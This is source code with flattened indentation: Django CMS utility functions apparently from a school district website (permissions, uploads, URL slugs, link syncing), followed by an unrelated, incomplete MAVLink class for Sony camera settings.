['jordan.collins@slcschools.org'],
reply_to=['donotreply@slcschools.org'],
headers={'Message-ID': str(uuid.uuid4())},
)
email.content_subtype = 'html'
try:
email.send(fail_silently=False)
except Exception:
return False
return True
def findfileext_media(media):
media = media.split('/')[-1:]
return os.path.splitext(media[0])
def urlclean_fileext(fileext):
return re.sub(
'-+', '-', re.sub(r'([\s+])', '-', re.sub(
r'([^.a-z0-9\s-])', '', fileext.lower())))
def urlclean_objname(objname):
return re.sub(
'-+', '-', re.sub(r'([\s+])', '-', re.sub(
r'([^a-z0-9\s-])', '', objname.lower())))
def urlclean_remdoubleslashes(objname):
return re.sub('/+', '/', objname.lower())
def silentdelete_media(media):
try:
if os.path.isfile(media):
os.remove(media)
elif os.path.isdir(media):
shutil.rmtree(media, ignore_errors=True)
except OSError:
pass
def silentmove_media(oldpath, newpath):
try:
if not os.path.isdir(oldpath) & os.path.isdir(newpath):
f = open('/tmp/movingfile.txt', 'a')
f.write('Moving: ' + oldpath + ' To: ' + newpath + '\n')
f.close()
shutil.move(oldpath, newpath)
else:
try:
f = open('/tmp/movingfile.txt', 'a')
f.write('Removing: ' + oldpath + '\n')
f.close()
os.rmdir(oldpath)
except OSError:
pass
except OSError:
pass
def has_add_permission(self, request, obj=None):
# Prevent showing the Save and Add Another Option
if request.path.split('/')[-2:][0] == 'change':
return False
if request.user.has_perm(
self.model._meta.app_label + '.' + get_permission_codename(
'add', self.model._meta)):
return True
elif request.user.groups.filter(name='Website Managers'):
return True
elif request.site.dashboard_sitepublisher_site.filter(account=request.user.pk):
return True
elif obj:
if get_permission_codename(
'add', self.model._meta) in get_perms(request.user, obj):
return True
return False
def has_change_permission(self, request, obj=None):
if self is not None:
# Check for regular global model permission
if request.user.has_perm(
self.model._meta.app_label + '.' + get_permission_codename(
'change', self.model._meta)):
return True
elif request.user.groups.filter(name='Website Managers'):
return True
elif request.site.dashboard_sitepublisher_site.filter(account=request.user.pk):
return True
if obj:
if request.user.is_authenticated:
if request.user.pk in can_edit_page(obj):
return True
# if request.user.groups.filter(name='Website Managers'):
# return True
# elif request.site.dashboard_sitepublisher_site.filter(account=request.user.pk):
# return True
# if obj.has_permissions:
# # Check for object level permission through Guardian
# if get_permission_codename(
# 'change', obj._meta) in get_perms(request.user, obj):
# return True
# else:
# node = objectfindnode(obj)
# permission_point = nodefindobject(
# node.get_ancestors().filter(has_permissions=True).last())
# if get_permission_codename(
# 'change', permission_point._meta) in get_perms(
# request.user, permission_point):
# return True
return False
def has_delete_permission(self, request, obj=None):
if request.user.has_perm(
self.model._meta.app_label + '.' + get_permission_codename(
'trash', self.model._meta)):
return True
elif request.user.groups.filter(name='Website Managers'):
return True
elif obj:
if obj.has_permissions:
# Check for object level permission through Guardian
if get_permission_codename(
'trash', self.model._meta) in get_perms(request.user, obj):
return True
else:
node = objectfindnode(obj)
permission_point = nodefindobject(
node.get_ancestors().filter(has_permissions=True).last())
if get_permission_codename(
'trash', permission_point._meta) in get_perms(
request.user, permission_point):
return True
return False
def has_add_permission_inline(self, request, obj=None):
# Allow if object is new (should always be new)
if obj is None:
return True
return False
def has_change_permission_inline(self, request, obj=None):
return True
def has_delete_permission_inline(self, request, obj=None):
return True
def modeltrash(self, *args, **kwargs):
if self.deleted == 0:
self.deleted = True
self.save()
else:
super(self._meta.model, self).delete()
def movechildren(self):
children = self.get_children()
for child in children:
if child.content_type == 'Board':
child.board.save()
elif child.content_type == 'BoardSubPage':
child.boardsubpage.save()
# Upload Image Functions
def image_upload_to(instance, filename):
original_file, original_extension = findfileext_media(filename)
full_path = '{0}{1}'.format(
instance.pk,
original_extension,
)
full_path = full_path.lower()
if not instance.image_file._committed:
silentdelete_media(settings.MEDIA_ROOT + '/' + full_path)
return full_path
# Upload File Functions
def file_upload_to(instance, filename):
original_file, original_extension = findfileext_media(filename)
full_path = '{0}{1}'.format(
instance.pk,
original_extension,
)
full_path = full_path.lower()
if not instance.file_file._committed:
silentdelete_media(settings.MEDIA_ROOT + '/' + full_path)
return full_path
def precinct_map_upload_to(instance, filename):
pass
# Save Content Functions
def modelsave(self, *args, **kwargs):
if not self.site:
if self.parent:
self.site = self.parent.site
else:
raise Exception('site not set for object. cannot be saved.')
Node = apps.get_model('objects', 'node')
User = apps.get_model('objects', 'user')
Alias = apps.get_model('multisite', 'alias')
# Is this a new instance?
is_new = self._state.adding
# Set deleted prefix
is_deleted = '_' if self.deleted is True else ''
# Set UUID if None
self.uuid = self.uuid if self.uuid else uuid.uuid4()
# Set original date on event
try:
if self._meta.get_field('originaldate'):
if (not self.originaldate) and self.startdate:
self.originaldate = self.startdate
self.originalinstance = len(self._meta.model.objects.filter(
originaldate=self.originaldate)) + 1
except FieldDoesNotExist:
pass
# Create Parent
if self.PARENT_TYPE:
creator = User.objects.get(username='webmaster@slcschools.org')
self.parent = self.create_parent(creator=creator)
# Force Parent
if self.PARENT_URL:
try:
self.parent = Node.objects.exclude(
uuid=self.uuid).get(url=self.PARENT_URL, site=self.site)
except Node.DoesNotExist:
pass
# Related Node matches Parent
try:
if self._meta.get_field('related_node'):
self.related_node = self.parent
except FieldDoesNotExist:
pass
# Force Title
self.title = self.force_title()
# Set Slug
self.slug = urlclean_objname(self.title)
if not self.sluginstance:
self.sluginstance = 0
# Set URL
urlchanged = False
parent_url = self.parent.url if self.parent else self.PARENT_URL
oldurl = self.url
self.url = urlclean_remdoubleslashes('/{0}/{1}/{2}{3}{4}/'.format(
parent_url,
self.URL_PREFIX,
is_deleted,
urlclean_objname(self.slug),
'' if self.sluginstance == 0 else '-{0}'.format(self.sluginstance),
)
)
while Node.objects.filter(site=self.site).filter(url=self.url).exclude(
pk=self.pk).count() >= 1:
self.sluginstance += 1
self.url = urlclean_remdoubleslashes('/{0}/{1}/{2}{3}{4}/'.format(
parent_url,
self.URL_PREFIX,
is_deleted,
urlclean_objname(self.slug),
'' if self.sluginstance == 0 else '-{0}'.format(self.sluginstance),
)
)
if not is_new and (oldurl != self.url):
urlchanged = True
Thread(target=urlchanged_email, args=(self, oldurl)).start()
# # Set new name for file fields
# currentname = None
# newname = None
# # Image file field
# try:
# if self.image_file:
# currentname = findfileext_media(self.image_file.name)
# newname = image_upload_to(self, currentname[0] + currentname[1])
# currentname = '{0}/{1}{2}'.format(
# '/'.join(newname.split('/')[:-1]),
# currentname[0],
# currentname[1],
# )
# self.image_file.name = newname
# except AttributeError:
# pass
# # File file field
# try:
# if self.file_file:
# currentname = findfileext_media(self.file_file.name)
# newname = file_upload_to(self, currentname[0] + currentname[1])
# currentname = '{0}/{1}{2}'.format(
# '/'.join(newname.split('/')[:-1]),
# currentname[0],
# currentname[1],
# )
# self.file_file.name = newname
# except AttributeError:
# pass
# Set the node_title for the node
self.node_title = self.title
# Set the node type
self.node_type = self._meta.app_label
# Set the content type
self.content_type = self._meta.model_name
# if not self.menu_title:
# self.menu_title = self.title
# Set school year for events
try:
if self._meta.get_field('schoolyear'):
self.schoolyear = str(
currentyear(self.startdate)['currentyear']['long']
)
except FieldDoesNotExist:
pass
# Set yearend for events
if self.node_type == 'events':
try:
if self._meta.get_field('yearend'):
self.schoolyear = str(
currentyear(self.startdate)['currentyear']['short']
)
except FieldDoesNotExist:
pass
# Does this item have permissions?
if self.HAS_PERMISSIONS:
self.has_permissions = True
else:
self.has_permissions = False
# Fix richtext anchor tags
for field in self._meta.fields:
if field.__class__ == RichTextField:
field_value = getattr(self, field.name)
if field_value:
links = re.findall(r'<a .*?</a>', field_value)
for link in links:
try:
url = re.search(
r'(?:href)=\"(.*?)\"',
link,
).groups()[0]
except AttributeError:
url = ''
try:
data_processed = re.search(
r'(?:data-processed)=\"(.*?)\"',
link,
).groups()[0]
except AttributeError:
data_processed = ''
if url != data_processed:
url_parsed = urlparse(url)
try:
site = Alias.objects.get(
domain=url_parsed.netloc).site
except Alias.DoesNotExist:
site = None
try:
if site:
node = Node.objects.get(
url=url_parsed.path, site=site)
else:
node = None
except Node.DoesNotExist:
node = None
rx = r'{0}'.format(link)
rr = link
if node:
rr = re.sub(r'data-id=\".*?\"',
'data-id="{0}"'.format(str(node.pk)), rr)
else:
rr = re.sub(r'data-id=\".*?\"',
'data-id="{0}"'.format(''), rr)
rr = re.sub(r'data-processed=\".*?\"',
'data-processed="{0}"'.format(url), rr)
rr = re.sub(r'[ ]+', ' ', rr)
field_value = re.sub(re.escape(rx), rr, field_value)
images = re.findall(r'<img .*? />', field_value)
for image in images:
try:
url = re.search(
r'(?:src)=\"(.*?)\"',
image,
).groups()[0]
except AttributeError:
url = ''
try:
data_processed = re.search(
r'(?:data-processed)=\"(.*?)\"',
image,
).groups()[0]
except AttributeError:
data_processed = ''
if url != data_processed:
url_parsed = urlparse(url)
try:
site = Alias.objects.get(
domain=url_parsed.netloc).site
except Alias.DoesNotExist:
site = None
try:
if site:
node = Node.objects.get(
url=url_parsed.path, site=site)
else:
node = None
except Node.DoesNotExist:
node = None
rx = r'{0}'.format(image)
rr = image
if node:
rr = re.sub(r'data-id=\".*?\"',
'data-id="{0}"'.format(str(node.pk)), rr)
else:
rr = re.sub(r'data-id=\".*?\"',
'data-id="{0}"'.format(''), rr)
rr = re.sub(r'data-processed=\".*?\"',
'data-processed="{0}"'.format(url), rr)
rr = re.sub(r'[ ]+', ' ', rr)
field_value = re.sub(re.escape(rx), rr, field_value)
setattr(self, field.name, field_value)
# Set Link URL to absolute URL
try:
if self._meta.get_field('link_url'):
self.link_url = link_url_absolute(self)
except FieldDoesNotExist:
pass
# Save the item
super(self._meta.model, self).save(*args, **kwargs)
# Set the section page count
if self.pagelayout.namespace == 'site-section.html':
node = objectfindnode(self)
node.section_page_count = len(
self
.get_children()
.filter(
node_type='pages',
content_type='page',
published=True,
deleted=False,
)
.exclude(
pagelayout__namespace='site-section.html',
)
)
node.save()
else:
node = objectfindnode(self)
node.section_page_count = 1
if self.parent:
if self.parent.pagelayout.namespace == 'site-section.html':
self.parent.section_page_count = len(
self.parent
.get_children()
.filter(
node_type='pages',
content_type='page',
published=True,
deleted=False,
)
.exclude(
Q(pagelayout__namespace='site-section.html') |
Q(pk=self.pk),
)
)
if self.published and not self.deleted:
self.parent.section_page_count += 1
self.parent.save()
node.save()
# # Move Directories for children then parent.
if urlchanged:
# Save Children to update their urls and move thier directories.
for child in self.get_children():
object = nodefindobject(child)
object.save()
# # Move Directory
# silentmove_media(
# settings.MEDIA_ROOT + oldurl,
# settings.MEDIA_ROOT + self.url
# )
# # Move File
# if currentname != newname:
# oldpath = '{0}/{1}'.format(settings.MEDIA_ROOT, currentname)
# newpath = '{0}/{1}'.format(settings.MEDIA_ROOT, newname)
# silentmove_media(oldpath, newpath)
# # Commenting file moves because newly uploaded files
# # think they are moving on upload.
# # filepath_email(self, oldpath, newpath)
related_resource_links(self)
clearcache(self)
# Model Inheritance Object
def nodefindobject(node):
return apps.get_model(
node.node_type + '.' + node.content_type).objects.get(pk=node.pk)
def objectfindnode(object):
Node = apps.get_model('objects', 'node')
return Node.objects.get(pk=object.pk)
# MPTT Tree Functions
def resetchildrentoalphatitle():
Node = apps.get_model('objects', 'node')
top = Node.objects.filter(node_type='pages').get(
node_title='Charter Schools')
children = top.get_children()
children = children.order_by('node_title')
parent = children[0]
parent.move_to(top, position='first-child')
for child in children[1:]:
parent = Node.objects.get(pk=parent.pk)
child = Node.objects.get(pk=child.pk)
child.move_to(parent, position='right')
'Moving {0} after {1}'.format(child, parent)
parent = child
# Cache Functions
def clearcache(object):
pass
def save_formset(self, request, form, formset, change):
# formset.save() returns instances but
# I do not need them so I am not storing them.
formset.save(commit=False)
for obj in formset.deleted_objects:
obj.delete()
for obj in formset.new_objects:
obj.create_user = request.user
obj.update_user = request.user
obj.site = request.site
try:
if not obj.primary_contact:
obj.primary_contact = request.user
except AttributeError:
pass
obj.save()
for obj in formset.changed_objects:
obj[0].update_user = request.user
obj[0].save()
formset.save_m2m()
def save_model(self, request, obj, form, change):
if getattr(obj, 'create_user', None) is None:
obj.create_user = request.user
obj.update_user = request.user
if getattr(obj, 'site', None) is None:
obj.site = request.site
super(self.__class__, self).save_model(request, obj, form, change)
def response_change(self, request, obj):
if 'next' in request.GET:
opts = self.model._meta
pk_value = obj._get_pk_val()
preserved_filters = self.get_preserved_filters(request)
msg_dict = {
'name': force_text(opts.verbose_name),
'obj': format_html(
'<a class="editlink" href="{}">{}</a>',
urlquote(request.path), obj),
}
if "_continue" in request.POST:
msg = format_html(
_('The {name} "{obj}" was changed successfully.'
'You may edit it again below.'),
**msg_dict
)
self.message_user(request, msg, messages.SUCCESS)
redirect_url = request.get_full_path()
redirect_url = add_preserved_filters({
'preserved_filters': preserved_filters,
'opts': opts}, redirect_url)
return HttpResponseRedirect(redirect_url)
if '_continue' not in request.POST:
msg = format_html(
_('The {name} "{obj}" was changed successfully.'),
**msg_dict
)
self.message_user(request, msg, messages.SUCCESS)
return HttpResponseRedirect(
base64.b64decode(request.GET['next']).decode('utf-8'))
return super(self.__class__, self).response_change(request, obj)
def get_management_website():
Site = apps.get_model('sites', 'site')
try:
return Site.objects.only('pk').get(name='Website Management').pk
except Site.DoesNotExist:
return ''
def get_district_office():
Location = apps.get_model('taxonomy', 'location')
try:
return Location.objects.only('pk').get(title='District Office').pk
except Location.DoesNotExist:
return ''
def get_districtcalendareventcategory_general():
DistrictCalendarEventCategory = apps.get_model(
'taxonomy',
'districtcalendareventcategory'
)
try:
return DistrictCalendarEventCategory.objects.only('pk').get(
title='General Event').pk
except DistrictCalendarEventCategory.DoesNotExist:
return ''
def get_webmaster(pk=True):
User = apps.get_model('objects', 'user')
try:
webmaster = User.objects.get(username='webmaster@slcschools.org')
if pk:
return webmaster.pk
else:
return webmaster
except User.DoesNotExist:
return ''
def get_default_pagelayout(pk=True):
PageLayout = apps.get_model('dashboard', 'pagelayout')
try:
layout = PageLayout.objects.get(title='Default')
if pk:
return layout.pk
else:
return layout
except PageLayout.DoesNotExist:
return ''
def get_contactpage(request, pk=True):
Node = apps.get_model('objects', 'node')
try:
page = Node.objects.get(node_title='Contact Us', site=request.site)
if pk:
return page.pk
else:
return page
except Node.DoesNotExist:
return ''
def currentyear(date=timezone.now()):
if date.month >= 7:
currentyearkey = date.year + 1
currentyearstring = str(date.year) + '-' + str(date.year + 1)[2:]
else:
currentyearkey = date.year
currentyearstring = str(date.year - 1) + '-' + str(date.year)[2:]
currentyear = {"short": currentyearkey, "long": currentyearstring}
return {'currentyear': currentyear}
def next_tuesday_sixthrity():
now = timezone.datetime.strptime(
timezone.datetime.now().strftime('%Y-%m-%d %H:%M'), '%Y-%m-%d %H:%M')
while now.weekday() != 1:
now += timedelta(days=1)
now += timedelta(hours=18 - int(now.strftime('%H')))
now += timedelta(minutes=30 - int(now.strftime('%M')))
return timezone.make_aware(now)
def tomorrow_midnight():
now = timezone.datetime.strptime(
timezone.datetime.now().strftime('%Y-%m-%d %H:%M'), '%Y-%m-%d %H:%M')
now += timedelta(days=1)
now += timedelta(hours=0 - int(now.strftime('%H')))
now += timedelta(minutes=0 - int(now.strftime('%M')))
return timezone.make_aware(now)
def december_thirty_first():
now = timezone.datetime.strptime(
timezone.datetime.now().strftime('%Y-%m-%d %H:%M'), '%Y-%m-%d %H:%M')
return timezone.make_aware(
timezone.datetime(now.year, 12, 31, 00, 00)
)
def file_name(self):
if (
(
self.parent.node_type == 'documents' and
self.parent.content_type == 'document'
) or (
self.parent.node_type == 'documents' and
self.parent.content_type == 'policy'
) or (
self.parent.node_type == 'documents' and
self.parent.content_type == 'administrativeprocedure'
) or (
self.parent.node_type == 'documents' and
self.parent.content_type == 'supportingdocument'
) or (
self.parent.node_type == 'documents' and
self.parent.content_type == 'boardmeetingexhibit'
) or (
self.parent.node_type == 'documents' and
self.parent.content_type == 'boardmeetingagendaitem'
)
):
return '{0}-{1}{2}'.format(
self.parent.slug,
self.slug,
findfileext_media(self.file_file.url)[1],
)
if (
(
self.parent.node_type == 'documents' and
self.parent.content_type == 'boardmeetingagenda'
) or (
self.parent.node_type == 'documents' and
self.parent.content_type == 'boardmeetingminutes'
)
):
return '{0}-{1}-{2}{3}'.format(
self.parent.parent.slug,
self.parent.slug,
self.slug,
findfileext_media(self.file_file.url)[1],
)
if (
(
self.parent.node_type == 'documents' and
self.parent.content_type == 'boardmeetingaudio'
) or (
self.parent.node_type == 'documents' and
self.parent.content_type == 'boardmeetingvideo'
)
):
return '{0}-{1}{2}'.format(
self.parent.parent.slug,
self.parent.slug,
findfileext_media(self.file_file.url)[1],
)
if (
(
self.node_type == 'images' and
self.content_type == 'thumbnail'
) or (
self.node_type == 'images' and
self.content_type == 'newsthumbnail'
) or (
self.node_type == 'images' and
self.content_type == 'pagebanner'
) or (
self.node_type == 'images' and
self.content_type == 'contentbanner'
) or (
self.node_type == 'images' and
self.content_type == 'profilepicture'
) or (
self.node_type == 'images' and
self.content_type == 'districtlogogif'
) or (
self.node_type == 'images' and
self.content_type == 'districtlogojpg'
) or (
self.node_type == 'images' and
self.content_type == 'districtlogopng'
) or (
self.node_type == 'images' and
self.content_type == 'districtlogotif'
) or (
self.node_type == 'images' and
self.content_type == 'districtlogo'
) or (
self.node_type == 'images' and
self.content_type == 'photogalleryimage'
) or (
self.node_type == 'images' and
self.content_type == 'inlineimage'
)
):
return '{0}{1}'.format(
self.slug,
findfileext_media(self.image_file.url)[1],
)
if(
self.node_type == 'files' and
self.content_type == 'precinctmap'
):
return '{0}{1}'.format(
self.slug,
findfileext_media(self.file_file.url)[1],
)
customerror_emailadmins(
'Missing File Name',
'Missing file name for: '
'{0} with node type: {1} and content type: {2}'.format(
self.pk,
self.node_type,
self.content_type,
)
)
return 'unkonwn'
def name_dot_field_dot_ext(generator):
"""
A namer that, given the following source file name::
photos/thumbnails/bulldog.jpg
will generate a name like this::
/path/to/generated/images/{image.pk}.{specfield}.{ext}
where "/path/to/generated/images/" is the value specified by the
``IMAGEKIT_CACHEFILE_DIR`` setting.
"""
source_filename = getattr(generator.source, 'name', None)
if 'specfield' in generator.options:
specfield = generator.options['specfield']
else:
raise Exception('Spec Field Options Must Include Spec Field Name.')
dir = settings.IMAGEKIT_CACHEFILE_DIR
ext = suggest_extension(source_filename or '', generator.format)
basename = os.path.basename(source_filename)
returnpath = os.path.normpath(os.path.join(dir, '%s.%s%s' % (
os.path.splitext(basename)[0], specfield, ext)))
return returnpath
def related_resource_links(self):
if self.node_type == 'pages' and self.content_type == 'school':
if self.website_url:
link, created = self.links_resourcelink_node.get_or_create(
related_locked='website_url',
parent=self,
site=self.site,
defaults={
'title': 'School Website',
'link_url': self.website_url,
'related_locked': True,
}
)
link.title = 'School Website'
link.link_url = self.website_url
link.related_locked = 'website_url'
link.related_type = '{0}-{1}'.format(
self.node_type,
self.content_type,
)
link.deleted = False
link.published = True
link.save()
else:
try:
link = self.links_resourcelink_node.get(
related_locked='website_url'
)
if link:
link.published = False
link.delete()
except self.links_resourcelink_node.model.DoesNotExist:
pass
if self.scc_url:
link, created = self.links_resourcelink_node.get_or_create(
related_locked='scc_url',
parent=self,
site=self.site,
defaults={
'title': 'School Community Council',
'link_url': self.scc_url,
'related_locked': True,
}
)
link.title = 'School Community Council'
link.link_url = self.scc_url
link.related_locked = 'scc_url'
link.related_type = '{0}-{1}'.format(
self.node_type,
self.content_type,
)
link.deleted = False
link.published = True
link.save()
else:
try:
link = self.links_resourcelink_node.get(
related_locked='scc_url'
)
if link:
link.published = False
link.delete()
except self.links_resourcelink_node.model.DoesNotExist:
pass
if self.calendar_url:
link, created = self.links_resourcelink_node.get_or_create(
related_locked='calendar_url',
parent=self,
site=self.site,
defaults={
'title': 'School Calendar',
'link_url': self.calendar_url,
'related_locked': True,
}
)
link.title = 'School Calendar'
link.link_url = self.calendar_url
link.related_locked = 'calendar_url'
link.related_type = '{0}-{1}'.format(
self.node_type,
self.content_type,
)
link.deleted = False
link.published = True
link.save()
else:
try:
link = self.links_resourcelink_node.get(
related_locked='calendar_url'
)
if link:
link.published = False
link.delete()
except self.links_resourcelink_node.model.DoesNotExist:
pass
if self.donate_url:
link, created = self.links_resourcelink_node.get_or_create(
related_locked='donate_url',
parent=self,
site=self.site,
defaults={
'title': 'Make a Donation',
'link_url': self.donate_url,
'related_locked': True,
}
)
link.title = 'Make a Donation'
link.link_url = self.donate_url
link.related_locked = 'donate_url'
link.related_type = '{0}-{1}'.format(
self.node_type,
self.content_type,
)
link.deleted = False
link.published = True
link.save()
else:
try:
link = self.links_resourcelink_node.get(
related_locked='donate_url'
)
if link:
link.published = False
link.delete()
except self.links_resourcelink_node.model.DoesNotExist:
pass
if self.node_type == 'documents' and self.content_type == 'document':
link, created = self.parent.links_resourcelink_node.get_or_create(
related_locked=str(self.uuid),
parent=self.parent,
site=self.site,
defaults={
'title': self.title,
'link_url': self.url,
'related_locked': True,
}
)
link.title = self.title
link.link_url = self.url
link.related_locked = str(self.uuid)
link.related_type = '{0}-{1}'.format(
self.node_type,
self.content_type,
)
link.deleted = self.deleted
link.published = self.published
doc_len = len(
self
.files_file_node
.filter(deleted=0)
.filter(published=1)
.filter(file_file__isnull=False)
)
if doc_len < 1:
link.published = False
elif doc_len > 1:
link.published = self.published
link.modal_ajax = True
link.target_blank = False
else:
link.published = self.published
link.modal_ajax = False
link.target_blank = True
link.save()
if self.node_type == 'pages' and self.content_type == 'subpage':
link, created = self.parent.links_resourcelink_node.get_or_create(
related_locked=str(self.uuid),
parent=self.parent,
site=self.site,
defaults={
'title': self.title,
'link_url': self.url,
'related_locked': True,
}
)
link.title = self.title
link.link_url = self.url
link.related_locked = str(self.uuid)
link.related_type = '{0}-{1}'.format(
self.node_type,
self.content_type,
)
link.deleted = self.deleted
link.published = self.published
link.save()
if self.node_type == 'pages' and self.content_type == 'boardsubpage':
link, created = self.parent.links_resourcelink_node.get_or_create(
related_locked=str(self.uuid),
parent=self.parent,
site=self.site,
defaults={
'title': self.title,
'link_url': self.url,
'related_locked': True,
}
)
link.title = self.title
link.link_url = self.url
link.related_locked = str(self.uuid)
link.related_type = '{0}-{1}'.format(
self.node_type,
self.content_type,
)
link.deleted = self.deleted
link.published = self.published
link.save()
if self.node_type == 'files':
related_resource_links(nodefindobject(self.parent))
def get_domain(site):
if settings.ENVIRONMENT_MODE == "development":
try:
site = Alias.objects.get(domain__contains='-dev', site=site)
except Alias.DoesNotExist:
pass
if settings.ENVIRONMENT_MODE == "test":
try:
site = Alias.objects.get(domain__contains='-test', site=site)
except Alias.DoesNotExist:
pass
return site.domain
def is_siteadmin(request):
if (
request.user.is_superuser or
request.user.groups.filter(name='Website Managers') or
request.site.dashboard_sitepublisher_site.filter(
account=request.user.pk)
):
return True
return False
def is_globaladmin(request):
if (
request.user.is_superuser or
request.user.groups.filter(name='Website Managers')
):
return True
return False
def link_url_absolute(self):
input_url = urlsplit(self.link_url)
working_url = list(input_url)
if self.link_url:
if not working_url[1]:
working_url[0] = 'https'
working_url[1] = self.site.domain
return urlunsplit(working_url)
def can_edit_page(node):
# Get Required Models
Employee = apps.get_model('users', 'Employee')
PageEditor = apps.get_model('users', 'PageEditor')
# Define the ordered dic to track all users
all_users = OrderedDict()
# Find all superusers
for username in (
Employee
.objects
.filter(
is_active=1,
deleted=0,
published=1,
is_superuser=1)
.values('pk', 'username')
):
if username['pk'] in all_users:
all_users[username['pk']]['roles'].append('superuser')
else:
all_users[username['pk']] = {
'username': username['username'], 'roles': ['superuser']}
# Find all website managers
for username in (
Employee
.objects
.filter(
is_active=1,
deleted=0,
published=1,
groups__name='Website Managers'
)
.values('pk', 'username')
):
if username['pk'] in all_users:
all_users[username['pk']]['roles'].append('website_manager')
else:
all_users[username['pk']] = {
'username': username['username'], 'roles': ['website_manager']}
# Final site publishers
for username in (
node
.site
.dashboard_sitepublisher_site
.all()
.only('account')
):
if username.account.is_active:
if username.account.pk in all_users:
all_users[username.account.pk]['roles'].append(
'site_publisher')
else:
all_users[username.account.pk] = {
'username': username.account.username, 'roles': ['site_publisher']}
# Find direct page editors for the node
for username in (
node
.users_pageeditor_node
.filter(
deleted=0,
employee__is_active=1,
employee__deleted=0,
employee__published=1
)
.values('employee__pk', 'employee__username')
):
if username['employee__pk'] in all_users:
all_users[username['employee__pk']]['roles'].append('page_editor')
else:
all_users[username['employee__pk']] = {
'username': username['employee__username'], 'roles': ['page_editor']}
# Find all parent nodes and their page editors
for node in (
node
.get_ancestors()
.filter(
deleted=0,
published=1
)
):
for username in (
node
.users_pageeditor_node
.filter(
deleted=0,
employee__is_active=1,
employee__deleted=0,
employee__published=1
)
.values('employee__pk', 'employee__username')
):
if username['employee__pk'] in all_users:
all_users[username['employee__pk']]['roles'].append(
'inherited_page_editor')
else:
all_users[username['employee__pk']] = {'username': username['employee__username'],
'roles': ['inherited_page_editor']}
# Return the ordered dict
return all_users
|
alpha_set_hack.py
|
# ===============================================================================================================================
#
# Name : mavlinkSonyCamWriteVals.py
# Desc : Global memory value class for use to write mavlink to sony cam
# Auth : AIR-obots Ai-Robots
#
# ===============================================================================================================================
#
# for paralel tasking of the camera action routines
#
# from multiprocessing import Process
import multiprocessing
# for debug
import logging
# for signal interypt handling
import signal
class mavlinkSonyCamWriteVals():
STATE_INIT = 99
STATE_READY = 1
STATE_CAM_WRITING = 2
STATE_MAV_READING = 3
STATE_MAV_WRITING = 4
STATE_CAM_READING = 5
numberOfVals = 0
WRITE_PREV_DATA = 1
DONT_WRITE_PREV_DATA = 0
MAV_REQ_ALL_PARAM = 255
ParamStillCap = 1
ParamWhiteBala = 2
ParamShutSpd = 4
ParamIso = 8
ParamFocus = 16
ParamFocusArea = 32
ParamAperture = 64
ParamExPro = 128
def __init__ (self):
self.set_sony_iso = mavlinkSonyCamWriteVals.STATE_INIT
self.set_sony_aperture = mavlinkSonyCamWriteVals.STATE_INIT
self.set_sony_ex_pro = mavlinkSonyCamWriteVals.STATE_INIT
self.set_sony_focus_area = mavlinkSonyCamWriteVals.STATE_INIT
self.set_sony_focus = mavlinkSonyCamWriteVals.STATE_INIT
self.set_sony_shutter = mavlinkSonyCamWriteVals.STATE_INIT
self.set_sony_white_bal = mavlinkSonyCamWriteVals.STATE_INIT
self.set_sony_still_cap_mode = mavlinkSonyCamWriteVals.STATE_INIT
self.prev_sony_iso = mavlinkSonyCamWriteVals.STATE_INIT
self.prev_sony_aperture = mavlinkSonyCamWriteVals.STATE_INIT
self.prev_sony_ex_pro = mavlinkSonyCamWriteVals.STATE_INIT
self.prev_sony_focus_area = mavlinkSonyCamWriteVals.STATE_INIT
self.prev_sony_focus = mavlinkSonyCamWriteVals.STATE_INIT
self.prev_sony_shutter = mavlinkSonyCamWriteVals.STATE_INIT
self.prev_sony_white_bal = mavlinkSonyCamWriteVals.STATE_INIT
self.prev_sony_still_cap_mode = mavlinkSonyCamWriteVals.STATE_INIT
self.mav_req_all_param = 0
self.state = mavlinkSonyCamWriteVals.STATE_INIT
mavlinkSonyCamWriteVals.numberOfVals += 1 # global counter of the number of values
def __del__(self):
class_name = self.__class__.__name__
print('{} Deleted'.format(class_name))
def get_value_counter(self):
print('mavlink to sony writes has %d set-points' % (mavlinkSonyCamWriteVals.numberOfVals))
return mavlinkSonyCamWriteVals.numberOfVals
def init_class_state( self ):
if (self.state == mavlinkSonyCamWriteVals.STATE_INIT):
self.state = mavlinkSonyCamWriteVals.STATE_READY
def setVal_sony_iso(self,value,myId,mode=0,timeout=20):
timeCnt = 0
while (not (self.state == mavlinkSonyCamWriteVals.STATE_READY)) and (timeCnt < timeout):
time.sleep(0.1)
timeCnt += 1
if (timeCnt < timeout):
self.state = myId
if mode == 1:
self.prev_sony_iso = self.set_sony_iso
self.set_sony_iso = value
self.state = mavlinkSonyCamWriteVals.STATE_READY
return True
else:
return False
def getVal_sony_iso(self,YourID,timeout=20):
timeCnt = 0
while (not (self.state == mavlinkSonyCamWriteVals.STATE_READY)) and (timeCnt < timeout):
time.sleep(0.1)
timeCnt += 1
if (timeCnt < timeout):
self.state = YourID
print(' value: {} previous: {}'.format(self.set_sony_iso,self.prev_sony_iso))
self.state = mavlinkSonyCamWriteVals.STATE_READY
return self.set_sony_iso,self.prev_sony_iso,True
else:
return self.set_sony_iso,self.prev_sony_iso,False
def setVal_sony_aperture(self,value,myId,mode=0,timeout=20):
timeCnt = 0
while (not (self.state == mavlinkSonyCamWriteVals.STATE_READY)) and (timeCnt < timeout):
time.sleep(0.1)
timeCnt += 1
if (timeCnt < timeout):
self.state = myId
if mode == 1:
self.prev_sony_aperture = self.set_sony_aperture
self.set_sony_aperture = value
self.state = mavlinkSonyCamWriteVals.STATE_READY
return True
else:
return False
def getVal_sony_aperture(self,YourID,timeout=20):
timeCnt = 0
while (not (self.state == mavlinkSonyCamWriteVals.STATE_READY)) and (timeCnt < timeout):
time.sleep(0.1)
timeCnt += 1
if (timeCnt < timeout):
self.state = YourID
print(' value: {} previous: {}'.format(self.set_sony_aperture,self.prev_sony_aperture))
self.state = mavlinkSonyCamWriteVals.STATE_READY
return self.set_sony_aperture,self.prev_sony_aperture,True
else:
return self.set_sony_aperture,self.prev_sony_aperture,False
def setVal_sony_ex_pro(self,value,myId,mode=0,timeout=20):
timeCnt = 0
while (not (self.state == mavlinkSonyCamWriteVals.STATE_READY)) and (timeCnt < timeout):
time.sleep(0.1)
timeCnt += 1
if (timeCnt < timeout):
self.state = myId
if mode == 1:
self.prev_sony_ex_pro = self.set_sony_ex_pro
self.set_sony_ex_pro = value
self.state = mavlinkSonyCamWriteVals.STATE_READY
return True
else:
return False
def getVal_sony_ex_pro(self,YourID,timeout=20):
timeCnt = 0
while (not (self.state == mavlinkSonyCamWriteVals.STATE_READY)) and (timeCnt < timeout):
time.sleep(0.1)
timeCnt += 1
if (timeCnt < timeout):
self.state = YourID
